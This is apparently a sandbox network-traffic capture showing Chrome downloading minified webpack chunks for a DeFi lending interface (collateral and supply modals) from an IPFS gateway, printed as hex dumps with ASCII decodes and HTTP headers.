                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1305INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 38 38 32 2c 36 35 30 34 5d 2c 7b 36 32 37 35 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 3d 72 28 36 34 38 33 36 29 3b 74 2e 5a 3d 76 6f 69 64 20 30 3b 76 61 72 20 6f 3d 6e 28 72 28 36 34 39 33 38 29 29 2c 69 3d 72 28 38 35 38 39 33 29 2c 73 3d 28 30 2c 6f 2e 64 65 66 61 75 6c 74 29 28 28 30 2c 69 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 6d 31 39 2e 37 37 20 37 2e 32 33 2e 30 31 2d 2e 30 31 2d 33 2e 37 32 2d 33 2e 37 32 4c 31 35 20 34 2e 35 36 6c 32 2e 31 31 20 32 2e 31 31 63 2d 2e 39 34 2e 33 36 2d 31 2e 36 31
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8882,6504],{62753:function(e,t,r){var n=r(64836);t.Z=void 0;var o=n(r(64938)),i=r(85893),s=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 3a 22 31 65 6d 22 2c 6f 76 65 72 66 6c 6f 77 3a 22 68 69 64 64 65 6e 22 2c 64 69 73 70 6c 61 79 3a 22 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 22 2c 74 65 78 74 41 6c 69 67 6e 3a 22 63 65 6e 74 65 72 22 2c 66 6c 65 78 53 68 72 69 6e 6b 3a 30 2c 66 6f 6e 74 53 69 7a 65 3a 7b 69 6e 68 65 72 69 74 3a 22 69 6e 68 65 72 69 74 22 2c 73 6d 61 6c 6c 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 32 30 29 2c 6d 65 64 69 75 6d 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 32 34 29 2c 6c 61 72 67 65 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 33 36 29 7d 5b 74 2e 66 6f 6e 74 53 69 7a 65 5d 2c 63 6f 6c 6f 72 3a 7b 70 72 69 6d 61 72 79 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 70 72 69 6d 61
                                                                                                                                                                                                                                                  Data Ascii: :"1em",overflow:"hidden",display:"inline-block",textAlign:"center",flexShrink:0,fontSize:{inherit:"inherit",small:e.typography.pxToRem(20),medium:e.typography.pxToRem(24),large:e.typography.pxToRem(36)}[t.fontSize],color:{primary:(e.vars||e).palette.prima
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 6e 2e 74 6f 41 72 72 61 79 28 65 29 2e 66 69 6c 74 65 72 28 42 6f 6f 6c 65 61 6e 29 3b 72 65 74 75 72 6e 20 72 2e 72 65 64 75 63 65 28 28 28 65 2c 6e 2c 6f 29 3d 3e 28 65 2e 70 75 73 68 28 6e 29 2c 6f 3c 72 2e 6c 65 6e 67 74 68 2d 31 26 26 65 2e 70 75 73 68 28 69 2e 63 6c 6f 6e 65 45 6c 65 6d 65 6e 74 28 74 2c 7b 6b 65 79 3a 60 73 65 70 61 72 61 74 6f 72 2d 24 7b 6f 7d 60 7d 29 29 2c 65 29 29 2c 5b 5d 29 7d 63 6f 6e 73 74 20 76 3d 28 30 2c 75 2e 5a 50 29 28 22 64 69 76 22 2c 7b 6e 61 6d 65 3a 22 4d 75 69 53 74 61 63 6b 22 2c 73 6c 6f 74 3a 22 52 6f 6f 74 22 2c 6f 76 65 72 72 69 64 65 73 52 65 73 6f 6c 76 65 72 3a 28 65 2c 74 29 3d 3e 5b 74 2e 72 6f 6f 74 5d 7d 29 28 28 28 7b 6f 77 6e 65 72 53 74 61 74 65 3a 65 2c 74 68 65 6d 65 3a 74 7d 29 3d 3e 7b 6c 65
                                                                                                                                                                                                                                                  Data Ascii: n.toArray(e).filter(Boolean);return r.reduce(((e,n,o)=>(e.push(n),o<r.length-1&&e.push(i.cloneElement(t,{key:`separator-${o}`})),e)),[])}const v=(0,u.ZP)("div",{name:"MuiStack",slot:"Root",overridesResolver:(e,t)=>[t.root]})((({ownerState:e,theme:t})=>{le
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 3b 74 2e 5a 3d 68 7d 2c 32 39 30 30 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 2e 64 28 74 2c 7b 6f 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 7d 7d 29 3b 76 61 72 20 6e 3d 72 28 35 39 34 39 39 29 2c 6f 3d 72 28 34 37 33 30 29 2c 69 3d 72 28 38 31 36 34 35 29 2c 73 3d 72 28 38 35 38 39 33 29 2c 61 3d 5b 22 73 78 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 74 26 26 28 6e 3d 6e 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72
                                                                                                                                                                                                                                                  Data Ascii: ;t.Z=h},29002:function(e,t,r){r.d(t,{o:function(){return u}});var n=r(59499),o=r(4730),i=r(81645),s=r(85893),a=["sx"];function c(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){r
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 34 35 20 31 36 2e 38 31 32 32 43 31 38 2e 33 35 39 35 20 31 37 2e 31 38 37 32 20 31 37 2e 38 35 30 37 20 31 37 2e 33 39 38 20 31 37 2e 33 32 30 33 20 31 37 2e 33 39 38 5a 22 7d 29 2c 28 30 2c 73 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 4d 31 34 2e 38 32 30 33 20 31 31 2e 33 39 37 39 43 31 34 2e 36 38 37 37 20 31 31 2e 33 39 37 39 20 31 34 2e 35 36 30 35 20 31 31 2e 33 34 35 33 20 31 34 2e 34 36 36 38 20 31 31 2e 32 35 31 35 43 31 34 2e 33 37 33 20 31 31 2e 31 35 37 37 20 31 34 2e 33 32 30 33 20 31 31 2e 30 33 30 36 20 31 34 2e 33 32 30 33 20 31 30 2e 38 39 37 39 43 31 34 2e 33 32 30 33 20 31 30 2e 37 36 35 33 20 31 34 2e 33 37 33 20 31 30 2e 36 33 38 32 20 31 34 2e 34 36 36 38 20 31 30 2e 35 34 34 34 43 31 34 2e 35 36 30 35 20 31 30 2e 34 35 30
                                                                                                                                                                                                                                                  Data Ascii: 45 16.8122C18.3595 17.1872 17.8507 17.398 17.3203 17.398Z"}),(0,s.jsx)("path",{d:"M14.8203 11.3979C14.6877 11.3979 14.5605 11.3453 14.4668 11.2515C14.373 11.1577 14.3203 11.0306 14.3203 10.8979C14.3203 10.7653 14.373 10.6382 14.4668 10.5444C14.5605 10.450
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 74 26 26 28 6e 3d 6e 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 74 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 72 2e 70 75 73 68 2e 61 70 70 6c 79 28 72 2c 6e 29 7d 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 72 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d
                                                                                                                                                                                                                                                  Data Ascii: bject.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}return r}function u(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 4e 75 6d 62 65 72 28 74 29 2c 78 3d 6e 75 6c 6c 21 3d 3d 6e 26 26 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 3a 30 3b 30 3d 3d 3d 62 3f 78 3d 30 3a 76 6f 69 64 20 30 3d 3d 3d 6e 26 26 28 78 3d 62 3e 31 7c 7c 6c 7c 7c 22 55 53 44 22 3d 3d 3d 72 3f 32 3a 37 29 3b 76 61 72 20 79 3d 4d 61 74 68 2e 70 6f 77 28 31 30 2c 2d 78 29 2c 67 3d 30 21 3d 3d 62 26 26 4d 61 74 68 2e 61 62 73 28 62 29 3c 4d 61 74 68 2e 61 62 73 28 79 29 2c 77 3d 67 3f 79 3a 62 2c 6a 3d 21 31 21 3d 3d 69 26 26 28 69 7c 7c 62 3e 39 39 39 39 39 29 3b 72 65 74 75 72 6e 20 66 26 26 21 6a 26 26 28 77 3d 4d 61 74 68 2e 74 72 75 6e 63 28 4e 75 6d 62 65 72 28 77 29 2a 4d 61 74 68 2e 70 6f 77 28 31 30 2c 78 29 29 2f 4d 61 74 68 2e 70 6f 77 28 31 30 2c 78 29 29 2c 28 30 2c 61 2e 6a 73 78 73 29 28 73 2e 5a
                                                                                                                                                                                                                                                  Data Ascii: Number(t),x=null!==n&&void 0!==n?n:0;0===b?x=0:void 0===n&&(x=b>1||l||"USD"===r?2:7);var y=Math.pow(10,-x),g=0!==b&&Math.abs(b)<Math.abs(y),w=g?y:b,j=!1!==i&&(i||b>99999);return f&&!j&&(w=Math.trunc(Number(w)*Math.pow(10,x))/Math.pow(10,x)),(0,a.jsxs)(s.Z
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 3d 5b 22 73 79 6d 62 6f 6c 73 22 2c 22 62 61 64 67 65 53 79 6d 62 6f 6c 22 5d 2c 76 3d 5b 22 73 79 6d 62 6f 6c 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 68 28 65 2c 74 29 7b 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 74 26 26 28 6e 3d 6e 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 74 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 72 2e 70 75 73 68 2e 61 70 70 6c 79 28 72 2c 6e 29 7d 72 65
                                                                                                                                                                                                                                                  Data Ascii: =["symbols","badgeSymbol"],v=["symbol"];function h(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}re
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 22 2e 63 6f 6e 63 61 74 28 77 69 6e 64 6f 77 2e 62 74 6f 61 28 75 6e 65 73 63 61 70 65 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 66 29 29 29 29 29 7d 65 6c 73 65 7b 76 61 72 20 76 2c 68 3d 28 6e 65 77 20 58 4d 4c 53 65 72 69 61 6c 69 7a 65 72 29 2e 73 65 72 69 61 6c 69 7a 65 54 6f 53 74 72 69 6e 67 28 6e 75 6c 6c 3d 3d 3d 28 76 3d 6f 2e 63 75 72 72 65 6e 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 76 3f 76 6f 69 64 20 30 3a 76 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 29 3b 72 28 22 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 22 2e 63 6f 6e 63 61 74 28 77 69 6e 64 6f 77 2e 62 74 6f 61 28 75 6e 65 73 63 61 70 65 28 65 6e 63 6f 64 65 55
                                                                                                                                                                                                                                                  Data Ascii: a:image/svg+xml;base64,".concat(window.btoa(unescape(encodeURIComponent(f)))))}else{var v,h=(new XMLSerializer).serializeToString(null===(v=o.current)||void 0===v?void 0:v.contentDocument);r("data:image/svg+xml;base64,".concat(window.btoa(unescape(encodeU


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  58192.168.2.549768209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC504OUTGET /_next/static/chunks/9671.96a31e2ffa610a87.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:44 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 16384
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreic4k6khgb2vj6wsuh5crijjd757ckchdsm7hcycynb6fmid666uba"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/9671.96a31e2ffa610a87.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreic4k6khgb2vj6wsuh5crijjd757ckchdsm7hcycynb6fmid666uba
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028478
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 32 33 35 63 63 66 34 31 63 64 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e4235ccf41cd-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1304INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 36 37 31 5d 2c 7b 36 32 37 35 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 76 61 72 20 6e 3d 74 28 36 34 38 33 36 29 3b 72 2e 5a 3d 76 6f 69 64 20 30 3b 76 61 72 20 6f 3d 6e 28 74 28 36 34 39 33 38 29 29 2c 73 3d 74 28 38 35 38 39 33 29 2c 61 3d 28 30 2c 6f 2e 64 65 66 61 75 6c 74 29 28 28 30 2c 73 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 6d 31 39 2e 37 37 20 37 2e 32 33 2e 30 31 2d 2e 30 31 2d 33 2e 37 32 2d 33 2e 37 32 4c 31 35 20 34 2e 35 36 6c 32 2e 31 31 20 32 2e 31 31 63 2d 2e 39 34 2e 33 36 2d 31 2e 36 31 20 31 2e 32 36
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9671],{62753:function(e,r,t){var n=t(64836);r.Z=void 0;var o=n(t(64938)),s=t(85893),a=(0,o.default)((0,s.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 6d 22 2c 6f 76 65 72 66 6c 6f 77 3a 22 68 69 64 64 65 6e 22 2c 64 69 73 70 6c 61 79 3a 22 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 22 2c 74 65 78 74 41 6c 69 67 6e 3a 22 63 65 6e 74 65 72 22 2c 66 6c 65 78 53 68 72 69 6e 6b 3a 30 2c 66 6f 6e 74 53 69 7a 65 3a 7b 69 6e 68 65 72 69 74 3a 22 69 6e 68 65 72 69 74 22 2c 73 6d 61 6c 6c 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 32 30 29 2c 6d 65 64 69 75 6d 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 32 34 29 2c 6c 61 72 67 65 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 33 36 29 7d 5b 72 2e 66 6f 6e 74 53 69 7a 65 5d 2c 63 6f 6c 6f 72 3a 7b 70 72 69 6d 61 72 79 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 70 72 69 6d 61 72 79 2e 6d
                                                                                                                                                                                                                                                  Data Ascii: m",overflow:"hidden",display:"inline-block",textAlign:"center",flexShrink:0,fontSize:{inherit:"inherit",small:e.typography.pxToRem(20),medium:e.typography.pxToRem(24),large:e.typography.pxToRem(36)}[r.fontSize],color:{primary:(e.vars||e).palette.primary.m
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 41 72 72 61 79 28 65 29 2e 66 69 6c 74 65 72 28 42 6f 6f 6c 65 61 6e 29 3b 72 65 74 75 72 6e 20 74 2e 72 65 64 75 63 65 28 28 28 65 2c 6e 2c 6f 29 3d 3e 28 65 2e 70 75 73 68 28 6e 29 2c 6f 3c 74 2e 6c 65 6e 67 74 68 2d 31 26 26 65 2e 70 75 73 68 28 73 2e 63 6c 6f 6e 65 45 6c 65 6d 65 6e 74 28 72 2c 7b 6b 65 79 3a 60 73 65 70 61 72 61 74 6f 72 2d 24 7b 6f 7d 60 7d 29 29 2c 65 29 29 2c 5b 5d 29 7d 63 6f 6e 73 74 20 68 3d 28 30 2c 75 2e 5a 50 29 28 22 64 69 76 22 2c 7b 6e 61 6d 65 3a 22 4d 75 69 53 74 61 63 6b 22 2c 73 6c 6f 74 3a 22 52 6f 6f 74 22 2c 6f 76 65 72 72 69 64 65 73 52 65 73 6f 6c 76 65 72 3a 28 65 2c 72 29 3d 3e 5b 72 2e 72 6f 6f 74 5d 7d 29 28 28 28 7b 6f 77 6e 65 72 53 74 61 74 65 3a 65 2c 74 68 65 6d 65 3a 72 7d 29 3d 3e 7b 6c 65 74 20 74 3d
                                                                                                                                                                                                                                                  Data Ascii: Array(e).filter(Boolean);return t.reduce(((e,n,o)=>(e.push(n),o<t.length-1&&e.push(s.cloneElement(r,{key:`separator-${o}`})),e)),[])}const h=(0,u.ZP)("div",{name:"MuiStack",slot:"Root",overridesResolver:(e,r)=>[r.root]})((({ownerState:e,theme:r})=>{let t=
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 3d 6d 7d 2c 33 34 32 30 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 74 2e 72 28 72 29 2c 74 2e 64 28 72 2c 7b 43 6f 6c 6c 61 74 65 72 61 6c 43 68 61 6e 67 65 4d 6f 64 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 7d 7d 29 3b 76 61 72 20 6e 2c 6f 3d 74 28 35 39 34 39 39 29 2c 73 3d 74 28 34 39 35 30 31 29 2c 61 3d 28 74 28 36 37 32 39 34 29 2c 74 28 34 37 31 33 30 29 29 2c 69 3d 74 28 38 31 39 35 29 2c 6c 3d 74 28 33 31 39 35 39 29 2c 63 3d 74 28 39 34 36 33 35 29 2c 75 3d 74 28 31 32 37 39 29 2c 64 3d 74 28 32 30 38 35 34 29 2c 76 3d 74 28 32 39 36 33 30 29 2c 70 3d 74 28 36 39 33 33 31 29 2c 66 3d 74 28 34 33 36 32 39 29 2c 68 3d 74 28 36 37 39 31 36 29 2c 6d 3d 74 28 39 33 36 30 38 29 2c 41 3d 74 28 35 37 38 32 34 29 2c 62
                                                                                                                                                                                                                                                  Data Ascii: =m},34204:function(e,r,t){t.r(r),t.d(r,{CollateralChangeModal:function(){return I}});var n,o=t(59499),s=t(49501),a=(t(67294),t(47130)),i=t(8195),l=t(31959),c=t(94635),u=t(1279),d=t(20854),v=t(29630),p=t(69331),f=t(43629),h=t(67916),m=t(93608),A=t(57824),b
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 67 2e 2e 2e 22 7d 29 2c 68 61 6e 64 6c 65 41 63 74 69 6f 6e 3a 63 7d 29 7d 3b 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 5b 65 2e 44 4f 5f 4e 4f 54 5f 48 41 56 45 5f 53 55 50 50 4c 49 45 53 5f 49 4e 5f 54 48 49 53 5f 43 55 52 52 45 4e 43 59 3d 30 5d 3d 22 44 4f 5f 4e 4f 54 5f 48 41 56 45 5f 53 55 50 50 4c 49 45 53 5f 49 4e 5f 54 48 49 53 5f 43 55 52 52 45 4e 43 59 22 2c 65 5b 65 2e 43 41 4e 5f 4e 4f 54 5f 55 53 45 5f 54 48 49 53 5f 43 55 52 52 45 4e 43 59 5f 41 53 5f 43 4f 4c 4c 41 54 45 52 41 4c 3d 31 5d 3d 22 43 41 4e 5f 4e 4f 54 5f 55 53 45 5f 54 48 49 53 5f 43 55 52 52 45 4e 43 59 5f 41 53 5f 43 4f 4c 4c 41 54 45 52 41 4c 22 2c 65 5b 65 2e 43 41 4e 5f 4e 4f 54 5f 53 57 49 54 43 48 5f 55 53 41 47 45 5f 41 53 5f 43 4f 4c 4c 41 54 45 52 41 4c 5f 4d 4f 44
                                                                                                                                                                                                                                                  Data Ascii: g..."}),handleAction:c})};!function(e){e[e.DO_NOT_HAVE_SUPPLIES_IN_THIS_CURRENCY=0]="DO_NOT_HAVE_SUPPLIES_IN_THIS_CURRENCY",e[e.CAN_NOT_USE_THIS_CURRENCY_AS_COLLATERAL=1]="CAN_NOT_USE_THIS_CURRENCY_AS_COLLATERAL",e[e.CAN_NOT_SWITCH_USAGE_AS_COLLATERAL_MOD
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 28 22 31 22 29 26 26 28 6b 3d 6e 2e 43 41 4e 5f 4e 4f 54 5f 53 57 49 54 43 48 5f 55 53 41 47 45 5f 41 53 5f 43 4f 4c 4c 41 54 45 52 41 4c 5f 4d 4f 44 45 29 3b 76 61 72 20 48 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 73 77 69 74 63 68 28 6b 29 7b 63 61 73 65 20 6e 2e 44 4f 5f 4e 4f 54 5f 48 41 56 45 5f 53 55 50 50 4c 49 45 53 5f 49 4e 5f 54 48 49 53 5f 43 55 52 52 45 4e 43 59 3a 72 65 74 75 72 6e 28 30 2c 54 2e 6a 73 78 29 28 73 2e 63 43 2c 7b 69 64 3a 22 59 6f 75 20 64 6f 20 6e 6f 74 20 68 61 76 65 20 73 75 70 70 6c 69 65 73 20 69 6e 20 74 68 69 73 20 63 75 72 72 65 6e 63 79 22 7d 29 3b 63 61 73 65 20 6e 2e 43 41 4e 5f 4e 4f 54 5f 55 53 45 5f 54 48 49 53 5f 43 55 52 52 45 4e 43 59 5f 41 53 5f 43 4f 4c 4c 41 54 45 52 41 4c 3a 72 65 74 75 72 6e 28 30 2c 54 2e 6a
                                                                                                                                                                                                                                                  Data Ascii: ("1")&&(k=n.CAN_NOT_SWITCH_USAGE_AS_COLLATERAL_MODE);var H=function(){switch(k){case n.DO_NOT_HAVE_SUPPLIES_IN_THIS_CURRENCY:return(0,T.jsx)(s.cC,{id:"You do not have supplies in this currency"});case n.CAN_NOT_USE_THIS_CURRENCY_AS_COLLATERAL:return(0,T.j
                                                                                                                                                                                                                                                  2024-09-28 04:11:44 UTC1369INData Raw: 61 74 69 6f 6e 20 6d 6f 64 65 20 61 6e 64 20 6f 74 68 65 72 20 74 6f 6b 65 6e 73 20 63 61 6e 20 6e 6f 77 20 62 65 20 75 73 65 64 20 61 73 20 63 6f 6c 6c 61 74 65 72 61 6c 22 7d 29 7d 29 2c 72 2e 69 73 49 73 6f 6c 61 74 65 64 26 26 79 2e 64 65 74 65 72 6d 69 6e 65 57 61 72 6e 69 6e 67 44 69 73 70 6c 61 79 28 7b 64 65 62 74 43 65 69 6c 69 6e 67 3a 79 7d 29 2c 28 30 2c 54 2e 6a 73 78 73 29 28 41 2e 6d 36 2c 7b 67 61 73 4c 69 6d 69 74 3a 45 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 54 2e 6a 73 78 29 28 41 2e 6f 44 2c 7b 73 79 6d 62 6f 6c 3a 72 2e 73 79 6d 62 6f 6c 2c 69 63 6f 6e 53 79 6d 62 6f 6c 3a 72 2e 69 63 6f 6e 53 79 6d 62 6f 6c 2c 64 65 73 63 72 69 70 74 69 6f 6e 3a 28 30 2c 54 2e 6a 73 78 29 28 73 2e 63 43 2c 7b 69 64 3a 22 53 75 70 70 6c 79 20 62 61
